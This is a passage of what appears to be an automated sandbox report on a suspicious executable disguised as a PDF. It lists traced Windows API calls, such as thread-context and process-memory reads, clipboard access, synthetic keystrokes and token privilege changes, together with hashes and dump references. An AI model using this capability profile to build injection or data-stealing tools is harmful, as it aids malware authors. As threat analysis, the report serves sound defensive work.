                                                                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01C51AF1
                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01C51B13
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1752233617.0000000001C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01C50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1c50000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                          • String ID:
                                                                          • API String ID: 2438371351-0
                                                                          • Opcode ID: 47f45bba1b7d6f78db91ee930b61901a72fbf3bd75938062ef2b5451d70cd9db
                                                                          • Instruction ID: 6cb7482b05df4642b518befdf6af70dffec887d69d25c7d33b94d64c82c9e604
                                                                          • Opcode Fuzzy Hash: 47f45bba1b7d6f78db91ee930b61901a72fbf3bd75938062ef2b5451d70cd9db
                                                                          • Instruction Fuzzy Hash: 0A12CE24E24658C6EB24DF64D8547DEB232FF68300F1090E9910DEB7A5E77A4F81CB5A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b1f9c8d882bde5bd5349857b9acb3a298cef5b6ffaa9239d86839812ed071f13
                                                                          • Instruction ID: c483947139111f626f210485b6e0f9211935dcaf34eb5cae71a135399027a032
                                                                          • Opcode Fuzzy Hash: b1f9c8d882bde5bd5349857b9acb3a298cef5b6ffaa9239d86839812ed071f13
                                                                          • Instruction Fuzzy Hash: 2E518335600614AFCF14EB68DA91FBE77E5AF49314F1481A8F90AAB392DB30ED00CB55
                                                                          APIs
                                                                          • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00AE5CF6
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: FilePointer
                                                                          • String ID:
                                                                          • API String ID: 973152223-0
                                                                          • Opcode ID: 1263c85e79c9483b2a9f5f46fb93f29fb63a8676dae0506d796dc79645bab6b0
                                                                          • Instruction ID: 0ec67e3cc9209c739ad9376c5f6e78263ff49140456cca71ec6094e4fbb9a4ba
                                                                          • Opcode Fuzzy Hash: 1263c85e79c9483b2a9f5f46fb93f29fb63a8676dae0506d796dc79645bab6b0
                                                                          • Instruction Fuzzy Hash: B4316D31E00B49AFCB18CF2ED9946ADB7B5FF88314F248629D81993710D771B960DB90
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: ClearVariant
                                                                          • String ID:
                                                                          • API String ID: 1473721057-0
                                                                          • Opcode ID: c5a27dbd400c46533cdb48808e28d05890d724af826b67fa65ec5c9cc704677e
                                                                          • Instruction ID: 24b9abdea134650e6da9e94cb8ddc9c002c47c5b4ea6d45e23d2c34a6c8817f2
                                                                          • Opcode Fuzzy Hash: c5a27dbd400c46533cdb48808e28d05890d724af826b67fa65ec5c9cc704677e
                                                                          • Instruction Fuzzy Hash: 15410574508391CFDB24DF15C484B1ABBE0BF45318F1988ACE8998B762C736EC85CB52
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove
                                                                          • String ID:
                                                                          • API String ID: 4104443479-0
                                                                          • Opcode ID: 59a6117cc4e82b9340e85e26d54405980d529d2a02b8e949355077fe1b7f40f6
                                                                          • Instruction ID: 35890f21c21c5ef5f7a3f2d71a8094aa89b1c271666b1ff8d2caf40252b63ea9
                                                                          • Opcode Fuzzy Hash: 59a6117cc4e82b9340e85e26d54405980d529d2a02b8e949355077fe1b7f40f6
                                                                          • Instruction Fuzzy Hash: FA21D531A00A08EBDF145F65F986AAE7FF8FF14390F6184AAE895D6010EF70D4E09745
                                                                          APIs
                                                                            • Part of subcall function 00AE4D13: FreeLibrary.KERNEL32(00000000,?), ref: 00AE4D4D
                                                                            • Part of subcall function 00B0548B: __wfsopen.LIBCMT ref: 00B05496
                                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00BA62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00AE4F6F
                                                                            • Part of subcall function 00AE4CC8: FreeLibrary.KERNEL32(00000000), ref: 00AE4D02
                                                                            • Part of subcall function 00AE4DD0: _memmove.LIBCMT ref: 00AE4E1A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Library$Free$Load__wfsopen_memmove
                                                                          • String ID:
                                                                          • API String ID: 1396898556-0
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: ClearVariant
                                                                          • String ID:
                                                                          • API String ID: 1473721057-0
                                                                          APIs
                                                                          • ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,00AE5807,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00AE5D76
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: FileRead
                                                                          • String ID:
                                                                          • API String ID: 2738559852-0
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove
                                                                          • String ID:
                                                                          • API String ID: 4104443479-0
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove
                                                                          • String ID:
                                                                          • API String ID: 4104443479-0
                                                                          APIs
                                                                          • __lock_file.LIBCMT ref: 00B04AD6
                                                                            • Part of subcall function 00B08D68: __getptd_noexit.LIBCMT ref: 00B08D68
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: __getptd_noexit__lock_file
                                                                          • String ID:
                                                                          • API String ID: 2597487223-0
                                                                          APIs
                                                                          • FreeLibrary.KERNEL32(?,?,00BA62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00AE4FDE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: FreeLibrary
                                                                          • String ID:
                                                                          • API String ID: 3664257935-0
                                                                          APIs
                                                                          • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00B009F4
                                                                            • Part of subcall function 00AE7D2C: _memmove.LIBCMT ref: 00AE7D66
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: LongNamePath_memmove
                                                                          • String ID:
                                                                          • API String ID: 2514874351-0
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: __fread_nolock
                                                                          • String ID:
                                                                          • API String ID: 2638373210-0
                                                                          APIs
                                                                          • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,00B1E16B,?,?,00000000), ref: 00AE5DBF
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: FilePointer
                                                                          • String ID:
                                                                          • API String ID: 973152223-0
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: __wfsopen
                                                                          • String ID:
                                                                          • API String ID: 197181222-0
                                                                          APIs
                                                                          • GetLastError.KERNEL32(00000002,00000000), ref: 00B4D46A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast
                                                                          • String ID:
                                                                          • API String ID: 1452528299-0
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          APIs
                                                                          • Sleep.KERNELBASE(000001F4), ref: 01C522B1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1752233617.0000000001C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01C50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1c50000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Sleep
                                                                          • String ID:
                                                                          • API String ID: 3472027048-0
                                                                          APIs
                                                                            • Part of subcall function 00AE2612: GetWindowLongW.USER32(?,000000EB), ref: 00AE2623
                                                                          • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00B6CE50
                                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B6CE91
                                                                          • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00B6CED6
                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B6CF00
                                                                          • SendMessageW.USER32 ref: 00B6CF29
                                                                          • _wcsncpy.LIBCMT ref: 00B6CFA1
                                                                          • GetKeyState.USER32(00000011), ref: 00B6CFC2
                                                                          • GetKeyState.USER32(00000009), ref: 00B6CFCF
                                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B6CFE5
                                                                          • GetKeyState.USER32(00000010), ref: 00B6CFEF
                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B6D018
                                                                          • SendMessageW.USER32 ref: 00B6D03F
                                                                          • SendMessageW.USER32(?,00001030,?,00B6B602), ref: 00B6D145
                                                                          • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00B6D15B
                                                                          • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00B6D16E
                                                                          • SetCapture.USER32(?), ref: 00B6D177
                                                                          • ClientToScreen.USER32(?,?), ref: 00B6D1DC
                                                                          • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00B6D1E9
                                                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00B6D203
                                                                          • ReleaseCapture.USER32 ref: 00B6D20E
                                                                          • GetCursorPos.USER32(?), ref: 00B6D248
                                                                          • ScreenToClient.USER32(?,?), ref: 00B6D255
                                                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 00B6D2B1
                                                                          • SendMessageW.USER32 ref: 00B6D2DF
                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00B6D31C
                                                                          • SendMessageW.USER32 ref: 00B6D34B
                                                                          • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00B6D36C
                                                                          • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00B6D37B
                                                                          • GetCursorPos.USER32(?), ref: 00B6D39B
                                                                          • ScreenToClient.USER32(?,?), ref: 00B6D3A8
                                                                          • GetParent.USER32(?), ref: 00B6D3C8
                                                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 00B6D431
                                                                          • SendMessageW.USER32 ref: 00B6D462
                                                                          • ClientToScreen.USER32(?,?), ref: 00B6D4C0
                                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00B6D4F0
                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00B6D51A
                                                                          • SendMessageW.USER32 ref: 00B6D53D
                                                                          • ClientToScreen.USER32(?,?), ref: 00B6D58F
                                                                          • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00B6D5C3
                                                                            • Part of subcall function 00AE25DB: GetWindowLongW.USER32(?,000000EB), ref: 00AE25EC
                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00B6D65F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                          • String ID: @GUI_DRAGID$F
                                                                          • API String ID: 3977979337-4164748364
                                                                          APIs
                                                                          • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00B6873F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend
                                                                          • String ID: %d/%02d/%02d
                                                                          • API String ID: 3850602802-328681919
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove$_memset
                                                                          • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                                          • API String ID: 1357608183-1798697756
                                                                          APIs
                                                                          • GetForegroundWindow.USER32(00000000,?), ref: 00AE4A3D
                                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B1DA8E
                                                                          • IsIconic.USER32(?), ref: 00B1DA97
                                                                          • ShowWindow.USER32(?,00000009), ref: 00B1DAA4
                                                                          • SetForegroundWindow.USER32(?), ref: 00B1DAAE
                                                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00B1DAC4
                                                                          • GetCurrentThreadId.KERNEL32 ref: 00B1DACB
                                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00B1DAD7
                                                                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 00B1DAE8
                                                                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 00B1DAF0
                                                                          • AttachThreadInput.USER32(00000000,?,00000001), ref: 00B1DAF8
                                                                          • SetForegroundWindow.USER32(?), ref: 00B1DAFB
                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B1DB10
                                                                          • keybd_event.USER32(00000012,00000000), ref: 00B1DB1B
                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B1DB25
                                                                          • keybd_event.USER32(00000012,00000000), ref: 00B1DB2A
                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B1DB33
                                                                          • keybd_event.USER32(00000012,00000000), ref: 00B1DB38
                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B1DB42
                                                                          • keybd_event.USER32(00000012,00000000), ref: 00B1DB47
                                                                          • SetForegroundWindow.USER32(?), ref: 00B1DB4A
                                                                          • AttachThreadInput.USER32(?,?,00000000), ref: 00B1DB71
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                          • String ID: Shell_TrayWnd
                                                                          • API String ID: 4125248594-2988720461
                                                                          APIs
                                                                            • Part of subcall function 00B38CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B38D0D
                                                                            • Part of subcall function 00B38CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B38D3A
                                                                            • Part of subcall function 00B38CC3: GetLastError.KERNEL32 ref: 00B38D47
                                                                          • _memset.LIBCMT ref: 00B3889B
                                                                          • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00B388ED
                                                                          • CloseHandle.KERNEL32(?), ref: 00B388FE
                                                                          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00B38915
                                                                          • GetProcessWindowStation.USER32 ref: 00B3892E
                                                                          • SetProcessWindowStation.USER32(00000000), ref: 00B38938
                                                                          • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00B38952
                                                                            • Part of subcall function 00B38713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00B38851), ref: 00B38728
                                                                            • Part of subcall function 00B38713: CloseHandle.KERNEL32(?,?,00B38851), ref: 00B3873A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                          • String ID: $default$winsta0
                                                                          • API String ID: 2063423040-1027155976
                                                                          APIs
                                                                          • OpenClipboard.USER32(00B6F910), ref: 00B54284
                                                                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 00B54292
                                                                          • GetClipboardData.USER32(0000000D), ref: 00B5429A
                                                                          • CloseClipboard.USER32 ref: 00B542A6
                                                                          • GlobalLock.KERNEL32(00000000), ref: 00B542C2
                                                                          • CloseClipboard.USER32 ref: 00B542CC
                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00B542E1
                                                                          • IsClipboardFormatAvailable.USER32(00000001), ref: 00B542EE
                                                                          • GetClipboardData.USER32(00000001), ref: 00B542F6
                                                                          • GlobalLock.KERNEL32(00000000), ref: 00B54303
                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00B54337
                                                                          • CloseClipboard.USER32 ref: 00B54447
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                          • String ID:
                                                                          • API String ID: 3222323430-0
                                                                          APIs
                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00B4C9F8
                                                                          • FindClose.KERNEL32(00000000), ref: 00B4CA4C
                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00B4CA71
                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00B4CA88
                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00B4CAAF
                                                                          • __swprintf.LIBCMT ref: 00B4CAFB
                                                                          • __swprintf.LIBCMT ref: 00B4CB3E
                                                                            • Part of subcall function 00AE7F41: _memmove.LIBCMT ref: 00AE7F82
                                                                          • __swprintf.LIBCMT ref: 00B4CB92
                                                                            • Part of subcall function 00B038D8: __woutput_l.LIBCMT ref: 00B03931
                                                                          • __swprintf.LIBCMT ref: 00B4CBE0
                                                                            • Part of subcall function 00B038D8: __flsbuf.LIBCMT ref: 00B03953
                                                                            • Part of subcall function 00B038D8: __flsbuf.LIBCMT ref: 00B0396B
                                                                          • __swprintf.LIBCMT ref: 00B4CC2F
                                                                          • __swprintf.LIBCMT ref: 00B4CC7E
                                                                          • __swprintf.LIBCMT ref: 00B4CCCD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                          • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                          • API String ID: 3953360268-2428617273
                                                                          • Opcode ID: 8f9a077289b595df7ff929e1610d08f12fb94825e75d216337a3b1ef52674b96
                                                                          • Instruction ID: 78910b52f230c9537afdbd0c2625c825374ea909d374181bbab965a3a9b50e0b
                                                                          • Opcode Fuzzy Hash: 8f9a077289b595df7ff929e1610d08f12fb94825e75d216337a3b1ef52674b96
                                                                          • Instruction Fuzzy Hash: 0EA14CB2508345ABC700EB65C986DAFB7ECFF94704F40496DF586C7191EA74DA08CB62
                                                                          APIs
                                                                          • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00B4F221
                                                                          • _wcscmp.LIBCMT ref: 00B4F236
                                                                          • _wcscmp.LIBCMT ref: 00B4F24D
                                                                          • GetFileAttributesW.KERNEL32(?), ref: 00B4F25F
                                                                          • SetFileAttributesW.KERNEL32(?,?), ref: 00B4F279
                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00B4F291
                                                                          • FindClose.KERNEL32(00000000), ref: 00B4F29C
                                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00B4F2B8
                                                                          • _wcscmp.LIBCMT ref: 00B4F2DF
                                                                          • _wcscmp.LIBCMT ref: 00B4F2F6
                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00B4F308
                                                                          • SetCurrentDirectoryW.KERNEL32(00B9A5A0), ref: 00B4F326
                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00B4F330
                                                                          • FindClose.KERNEL32(00000000), ref: 00B4F33D
                                                                          • FindClose.KERNEL32(00000000), ref: 00B4F34F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                          • String ID: *.*
                                                                          • API String ID: 1803514871-438819550
                                                                          • Opcode ID: 304922502741d2ae5afb325700ef7a18d4165bbc340aa0600bcc9c2bd780b665
                                                                          • Instruction ID: 30c41afcefcd2f3c8537e6fbd5529891706f8ce6539c0399842c92e57e236d01
